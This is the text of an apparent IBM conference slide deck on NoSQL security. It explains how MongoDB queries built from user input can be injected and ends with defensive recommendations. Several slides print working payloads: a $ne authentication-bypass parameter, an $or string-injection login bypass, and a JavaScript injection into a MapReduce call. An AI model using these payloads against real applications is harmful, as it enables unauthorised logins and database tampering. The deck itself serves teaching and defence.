NO SQL! NO INJECTION? A talk on the state of NoSQL security IBM - - PowerPoint PPT Presentation

A talk on the state of NoSQL security

NO SQL! NO INJECTION?

IBM Cyber Security Center of Excellence Aviv Ron Alexandra Shulman-Peleg IBM AppScan Emanuel Bronshtein

IBM Security Systems – Cyber Center of Excellence

AVIV RON

• Security Researcher for IBM Cyber Security Center of Excellence

@aviv_ron

• Focus on Application Security in the cloud
• Ongoing research on new and emerging application vulnerabilities

for IBM AppScan, Application Security Testing

AppScan

IBM Security Systems – Cyber Center of Excellence

NOT ONLY SQL

According to http://db-engines.com

IBM Security Systems – Cyber Center of Excellence

It’s not that relational databases are bad but some use cases have better solutions

IBM Security Systems – Cyber Center of Excellence

We are just saying tables are not the solution for EVERYTHING

IBM Security Systems – Cyber Center of Excellence

Applications of NoSQL

PERFORMANCE SCALABILITY FLEXIBILITY REAL TIME WEB BIG DATA

Images are under Creative Commons license and are attributed to their creators

IBM Security Systems – Cyber Center of Excellence

SO… NO SQL, NO WORRIES?

IBM Security Systems – Cyber Center of Excellence

INTRODUCING NOSQL INJECTIONS

IBM Security Systems – Cyber Center of Excellence

A LOOK AT MONGODB

db.books.insert({ title: ‘The Hobbit’, author: ‘J.R.R. Tolkien’ }) db.books.find({ title: ‘The Hobbit’, author: ‘J.R.R. Tolkien’ }) array(‘title’ => ‘The hobbit’, ‘author’ => ‘J.R.R. Tolkien’);

IBM Security Systems – Cyber Center of Excellence

Login Username: Password: username=tolkien&password=hobbit

db->logins->find(array( “username”=>$_POST[“username”], “password”=>$_POST[“password”])); { username: ‘tolkien’, password: ‘hobbit’ }

IBM Security Systems – Cyber Center of Excellence

Login Username: Password: username[$ne]=1&password[$ne]=1

db->logins->find( array(“username”=>array(“$ne” => 1), “password”=> array(“$ne” => 1)); { username: { $ne: 1 }, password: { $ne: 1 } }

IBM Security Systems – Cyber Center of Excellence

PHP PARAMETER POLLUTION

db->logins->find( array(“$where”=>”function() { return this.price < 100 }”));

IBM Security Systems – Cyber Center of Excellence

PHP PARAMETER POLLUTION

db->logins->find( array(“$where”=>”function() { return this.price < 100 }”));

From PHP documentation: “Please make sure that for all special query

• perators (starting with $) you use single quotes

so that PHP doesn't try to replace "$exists" with the value of the variable $exists.”

IBM Security Systems – Cyber Center of Excellence

NOT ONLY IN PHP

let’s take a look at JavaScript

IBM Security Systems – Cyber Center of Excellence

Login Username: Password: username=tolkien&password=hobbit

string query = “{ username: ‘“ + post_username + “’, password: ‘” + post_password + “’ }” { username: ‘tolkien’, password: ‘hobbit’ }

IBM Security Systems – Cyber Center of Excellence

Login Username: Password: username=tolkien’, $or: [ {}, { ‘a’:’a&password=’ } ], $comment:’hacked’

string query = “{ username: ‘“ + post_username + “’, password: ‘” + post_password + “’ }” { username: ‘tolkien’, $or: [ {}, { ‘a’: ‘a’, password: ‘’ } ], $comment: ‘hacked’ }

IBM Security Systems – Cyber Center of Excellence

PEOPLE WILL ALWAYS FIND WAYS TO COMPENSATE FOR LIMITATIONS

IBM Security Systems – Cyber Center of Excellence

NOSQL JAVASCRIPT INJECTION

IBM Security Systems – Cyber Center of Excellence

MONGODB MAP REDUCE

$map = "function() { for (var i = 0; i < this.items.length; i++) { emit(this.name, this.items[i].$param); } }"; $reduce = "function(name, sum) { return Array.sum(sum); }"; $opt = "{ out: 'totals' }"; $db->execute("db.stores.mapReduce($map, $reduce, $opt);");

IBM Security Systems – Cyber Center of Excellence

ATTACK ON MAP REDUCE JAVASCRIPT

a);}},function(kv) { return 1; }, { out: 'x' });db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1

IBM Security Systems – Cyber Center of Excellence

a);}},function(kv) { return 1; }, { out: 'x' });db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 db.stores.mapReduce(function() { for (var i = 0; i < this.items.length; i++) { emit(this.name, this.items[i].a); } },function(kv) { return 1; }, { out: 'x' }); db.injection.insert({success:1}); return 1;db.stores.mapReduce(function() { { emit(1,1); } }, function(name, sum) { return Array.sum(sum); }, { out: 'totals' });"

ATTACK ON MAP REDUCE JAVASCRIPT

IBM Security Systems – Cyber Center of Excellence

NOW – LET’S HAVE SOME REST

IBM Security Systems – Cyber Center of Excellence

CSRF ATTACK ON NOSQL REST API

IBM Security Systems – Cyber Center of Excellence

IBM Security Systems – Cyber Center of Excellence

DEFENDING AGAINST RISKS

IBM Security Systems – Cyber Center of Excellence

• Injections
• Encode all user input – do not assemble JSON from strings
• If possible disable Javascript execution on DB

else be careful when inserting user input to javascript

• Beware of $ operators in PHP
• CSRF
• Check your HTTP API framework for CSRF protection

(NO JSONP, use of random token)

• General
• Use automatic tools for application security testing that support NoSQL

such as IBM AppScan

• Use of role based access control and the principal of least privilege

DEFENSES

NoSQL databases suffer from the same security issues their relational siblings do

IBM Security Systems – Cyber Center of Excellence

Q&A AND OPEN DISCUSSION

http://xkcd.com/327/